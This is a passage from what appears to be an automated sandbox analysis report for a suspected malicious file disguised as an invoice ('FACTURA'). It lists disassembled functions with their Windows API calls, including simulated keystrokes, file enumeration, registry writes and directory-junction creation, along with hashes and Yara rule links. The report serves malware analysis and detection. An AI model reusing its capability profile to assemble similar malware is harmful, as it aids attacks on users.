                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F5D05E
                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F5D06D
                                                                            • GetCursorPos.USER32(?), ref: 00F5D08D
                                                                            • ScreenToClient.USER32(?,?), ref: 00F5D09A
                                                                            • GetParent.USER32(?), ref: 00F5D0BA
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F5D123
                                                                            • SendMessageW.USER32 ref: 00F5D154
                                                                            • ClientToScreen.USER32(?,?), ref: 00F5D1B2
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F5D1E2
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F5D20C
                                                                            • SendMessageW.USER32 ref: 00F5D22F
                                                                            • ClientToScreen.USER32(?,?), ref: 00F5D281
                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F5D2B5
                                                                              • Part of subcall function 00ED25DB: GetWindowLongW.USER32(?,000000EB), ref: 00ED25EC
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F5D351
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                            • String ID: @GUI_DRAGID$F
                                                                            • API String ID: 302779176-4164748364
                                                                            • Opcode ID: 239d8294e1176b5566e23bda6774e1ad49b799d15705db875d6a518c49b909d9
                                                                            • Instruction ID: 61609895dcb59f2fd3ce9f2ff3fc0f085c60156815dbdffa94ff92abc9e3078c
                                                                            • Opcode Fuzzy Hash: 239d8294e1176b5566e23bda6774e1ad49b799d15705db875d6a518c49b909d9
                                                                            • Instruction Fuzzy Hash: F542BD34604344AFDB21CF24C844BAABBE5FF89722F140559FB96972B1C731D848EB92
                                                                            Function 00EE6F9E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5018COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$_memset
                                                                            • String ID: 3c$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_
                                                                            • API String ID: 1357608183-3681475764
                                                                            • Opcode ID: bc33d6403e2491b15b0b41d92404b4105b6f9e90853b026e9e68025d42ce9e70
                                                                            • Instruction ID: 53627836395d1927634fd4d25edb825b5fc78dd6a8e5e6699906f57275201d6b
                                                                            • Opcode Fuzzy Hash: bc33d6403e2491b15b0b41d92404b4105b6f9e90853b026e9e68025d42ce9e70
                                                                            • Instruction Fuzzy Hash: 0493B575E04229DFDB24CF98D881BADB7B1FF48320F25816AE945EB281E7749D81DB40
                                                                            Function 00ED48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(00000000,?), ref: 00ED48DF
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F0D665
                                                                            • IsIconic.USER32(?), ref: 00F0D66E
                                                                            • ShowWindow.USER32(?,00000009), ref: 00F0D67B
                                                                            • SetForegroundWindow.USER32(?), ref: 00F0D685
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F0D69B
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00F0D6A2
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F0D6AE
                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F0D6BF
                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F0D6C7
                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00F0D6CF
                                                                            • SetForegroundWindow.USER32(?), ref: 00F0D6D2
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F0D6E7
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00F0D6F2
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F0D6FC
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00F0D701
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F0D70A
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00F0D70F
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F0D719
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00F0D71E
                                                                            • SetForegroundWindow.USER32(?), ref: 00F0D721
                                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 00F0D748
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 4125248594-2988720461
                                                                            • Opcode ID: 76ce4ff902b6de19ccdfc1f43803d3ac8530904eaf52728c6904fbf25026575b
                                                                            • Instruction ID: 9280b8fd6204d3c5e419d5c6c6cd0f4dcb6984662eff3d501e2963d85a613afe
                                                                            • Opcode Fuzzy Hash: 76ce4ff902b6de19ccdfc1f43803d3ac8530904eaf52728c6904fbf25026575b
                                                                            • Instruction Fuzzy Hash: 81317071A4031CBBEB206BA19C89F7F7E6CEB44B61F144065FB05EB1D1DAB05901BBA1
                                                                            Function 00F3C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00F3C78D
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3C7E1
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F3C806
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F3C81D
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F3C844
                                                                            • __swprintf.LIBCMT ref: 00F3C890
                                                                            • __swprintf.LIBCMT ref: 00F3C8D3
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                            • __swprintf.LIBCMT ref: 00F3C927
                                                                              • Part of subcall function 00EF3698: __woutput_l.LIBCMT ref: 00EF36F1
                                                                            • __swprintf.LIBCMT ref: 00F3C975
                                                                              • Part of subcall function 00EF3698: __flsbuf.LIBCMT ref: 00EF3713
                                                                              • Part of subcall function 00EF3698: __flsbuf.LIBCMT ref: 00EF372B
                                                                            • __swprintf.LIBCMT ref: 00F3C9C4
                                                                            • __swprintf.LIBCMT ref: 00F3CA13
                                                                            • __swprintf.LIBCMT ref: 00F3CA62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                            • API String ID: 3953360268-2428617273
                                                                            • Opcode ID: cd323d428ea7f36112bae0cf240fcc9ceb1e70594c3e6f04d4df5e366c449e1a
                                                                            • Instruction ID: 7a96485285f989d5573b30427f61f4bdadfb1dbcf6a76cbd4fbd7b6e58e6fd18
                                                                            • Opcode Fuzzy Hash: cd323d428ea7f36112bae0cf240fcc9ceb1e70594c3e6f04d4df5e366c449e1a
                                                                            • Instruction Fuzzy Hash: 1AA11FB2404344ABC704EFA4CC85DAFB7ECFF95704F40191AF595D6292EA35DA09CB62
                                                                            Function 00F3EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00F3EFB6
                                                                            • _wcscmp.LIBCMT ref: 00F3EFCB
                                                                            • _wcscmp.LIBCMT ref: 00F3EFE2
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00F3EFF4
                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00F3F00E
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00F3F026
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3F031
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00F3F04D
                                                                            • _wcscmp.LIBCMT ref: 00F3F074
                                                                            • _wcscmp.LIBCMT ref: 00F3F08B
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3F09D
                                                                            • SetCurrentDirectoryW.KERNEL32(00F88920), ref: 00F3F0BB
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F3F0C5
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3F0D2
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3F0E4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                            • String ID: *.*
                                                                            • API String ID: 1803514871-438819550
                                                                            • Opcode ID: 625e63268b9242c9e93913c6942f1f37a4628cb0ca00ba996b95b482cef90d1e
                                                                            • Instruction ID: 8c1c72b55e9d9ef1f1145ee38466973233a0888ea9d5bd5ca682ba9e35fbc40d
                                                                            • Opcode Fuzzy Hash: 625e63268b9242c9e93913c6942f1f37a4628cb0ca00ba996b95b482cef90d1e
                                                                            • Instruction Fuzzy Hash: 2F31E772D0020D6ADB14ABB8DC48AEE77AC9F44371F1041B6F915E30A1DB70DA49EB61
                                                                            Function 00F50857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F50953
                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F5F910,00000000,?,00000000,?,?), ref: 00F509C1
                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F50A09
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F50A92
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00F50DB2
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00F50DBF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectCreateRegistryValue
                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                            • API String ID: 536824911-966354055
                                                                            • Opcode ID: 69dc055b02e31c7ef311f181af362f6618c5bc747bc0c8e1281990ac23d79fb7
                                                                            • Instruction ID: a11d5d6a4d5fc9abac7931613dbc711d6c6f7a89471c39a16c6a1d063df04789
                                                                            • Opcode Fuzzy Hash: 69dc055b02e31c7ef311f181af362f6618c5bc747bc0c8e1281990ac23d79fb7
                                                                            • Instruction Fuzzy Hash: 89026C756046019FCB14EF14C855E2AB7E5FF89724F04845DF999AB3A2DB30EC06DB81
                                                                            Function 00F5C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfilenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • DragQueryPoint.SHELL32(?,?), ref: 00F5C627
                                                                              • Part of subcall function 00F5AB37: ClientToScreen.USER32(?,?), ref: 00F5AB60
                                                                              • Part of subcall function 00F5AB37: GetWindowRect.USER32(?,?), ref: 00F5ABD6
                                                                              • Part of subcall function 00F5AB37: PtInRect.USER32(?,?,00F5C014), ref: 00F5ABE6
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00F5C690
                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F5C69B
                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F5C6BE
                                                                            • _wcscat.LIBCMT ref: 00F5C6EE
                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F5C705
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00F5C71E
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00F5C735
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00F5C757
                                                                            • DragFinish.SHELL32(?), ref: 00F5C75E
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00F5C851
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                            • API String ID: 2166380349-3440237614
                                                                            • Opcode ID: 596e39ade3173fbfe81b2793fdad72f80366a663b0fd4bd4b51cd18328052ce7
                                                                            • Instruction ID: 9f52bee595db24767585e51c8400fbd5e1695dacb4e820bea4ac2f0745eed3c3
                                                                            • Opcode Fuzzy Hash: 596e39ade3173fbfe81b2793fdad72f80366a663b0fd4bd4b51cd18328052ce7
                                                                            • Instruction Fuzzy Hash: 0B617F71108305AFC701EF64CC85DAFBBF8EF89751F00092EF695922A1DB719A49DB92
                                                                            Function 00F3F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00F3F113
                                                                            • _wcscmp.LIBCMT ref: 00F3F128
                                                                            • _wcscmp.LIBCMT ref: 00F3F13F
                                                                              • Part of subcall function 00F34385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F343A0
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00F3F16E
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3F179
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00F3F195
                                                                            • _wcscmp.LIBCMT ref: 00F3F1BC
                                                                            • _wcscmp.LIBCMT ref: 00F3F1D3
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3F1E5
                                                                            • SetCurrentDirectoryW.KERNEL32(00F88920), ref: 00F3F203
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F3F20D
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3F21A
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3F22C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*
                                                                            • API String ID: 1824444939-438819550
                                                                            • Opcode ID: 0d3616ac41d653a814db06e7dd1cc03caa71cbf2d494132e3f45e4f52a6ed34a
                                                                            • Instruction ID: 8b5fdfeb3ed9e008f8a1aff7d0fbd62e9c281682fbf69e5da23ca3eb5992184a
                                                                            • Opcode Fuzzy Hash: 0d3616ac41d653a814db06e7dd1cc03caa71cbf2d494132e3f45e4f52a6ed34a
                                                                            • Instruction Fuzzy Hash: 8231A276D0021DBADB20AAA4EC59AEF77AC9F85371F1041B5E910E20A0DB30DA4DEA54
                                                                            Function 00F3A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F3A20F
                                                                            • __swprintf.LIBCMT ref: 00F3A231
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F3A26E
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F3A293
                                                                            • _memset.LIBCMT ref: 00F3A2B2
                                                                            • _wcsncpy.LIBCMT ref: 00F3A2EE
                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F3A323
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F3A32E
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00F3A337
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F3A341
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                            • String ID: :$\$\??\%s
                                                                            • API String ID: 2733774712-3457252023
                                                                            • Opcode ID: 34c75bdbfff7d51095543224af54617ba0098665a19618c7eb31fc134284a7e6
                                                                            • Instruction ID: 6be5a53c67990fdf0b6550567a9fedb1ed27cdf64edf49342fbfc159752d95b7
                                                                            • Opcode Fuzzy Hash: 34c75bdbfff7d51095543224af54617ba0098665a19618c7eb31fc134284a7e6
                                                                            • Instruction Fuzzy Hash: 9331B2B1900209ABDB21DFA1DC49FEB37BCEF89751F1041B6F608D6160EB7196449B25
                                                                            Function 00F5C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F5C1FC
                                                                            • GetFocus.USER32 ref: 00F5C20C
                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00F5C217
                                                                            • _memset.LIBCMT ref: 00F5C342
                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F5C36D
                                                                            • GetMenuItemCount.USER32(?), ref: 00F5C38D
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00F5C3A0
                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F5C3D4
                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F5C41C
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F5C454
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00F5C489
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                            • String ID: 0
                                                                            • API String ID: 3616455698-4108050209
                                                                            • Opcode ID: 4d3847f25e86edef7db7c96533829d9270032be1d99c29e1aae6feacfceed417
                                                                            • Instruction ID: 33788c27bf700064a3005e1a5603ac4c1903b380a3e13525d7355d51270d5c45
                                                                            • Opcode Fuzzy Hash: 4d3847f25e86edef7db7c96533829d9270032be1d99c29e1aae6feacfceed417
                                                                            • Instruction Fuzzy Hash: 07818C716083059FDB11CF14C894E6BBBE8FB88725F00492EFE9697291D770D909EB92
                                                                            Function 00F27CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00F28202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F2821E
                                                                              • Part of subcall function 00F28202: GetLastError.KERNEL32(?,00F27CE2,?,?,?), ref: 00F28228
                                                                              • Part of subcall function 00F28202: GetProcessHeap.KERNEL32(00000008,?,?,00F27CE2,?,?,?), ref: 00F28237
